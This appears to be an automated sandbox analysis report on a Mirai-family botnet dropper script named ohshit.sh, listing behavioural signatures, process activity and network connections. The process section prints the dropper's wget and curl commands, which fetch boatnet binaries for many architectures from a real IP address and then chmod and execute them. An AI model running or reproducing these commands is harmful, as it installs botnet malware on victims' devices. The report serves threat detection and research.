Analysis Overview
SHA256
5b35f387f69bcb231b7e339c9ddeb610fd73ebf848f8cefdcfb26a2faabc5c6f
Threat Level: Known bad
The file ohshit.sh was found to be: Known bad.
Malicious Activity Summary
Mirai
Mirai family
Modifies Watchdog functionality
Executes dropped EXE
File and Directory Permissions Modification
Writes file to system bin folder
Enumerates running processes
UPX packed file
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 04:14
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 04:14
Reported
2024-11-09 04:17
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/1595/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/666/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1157/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1162/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1569/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1262/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/513/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1579/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/543/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/666/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1209/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1364/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/462/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1153/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1116/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/461/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/599/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1116/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1216/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1593/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/749/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1334/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1561/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1585/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1401/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1555/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/729/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1079/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1498/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1045/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1089/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/669/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1530/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/544/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1065/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1107/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1498/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1683/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1190/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1083/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1086/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1306/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/447/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/463/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1571/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1035/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1280/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1065/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1190/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1364/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/975/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1096/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/761/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1166/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1187/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1553/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/666/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/980/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1547/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/580/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1661/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1603/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1498/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1563/cmdline | /tmp/WTF | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-mAhB1J systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-EdkoHW systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 195.181.164.14:443 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
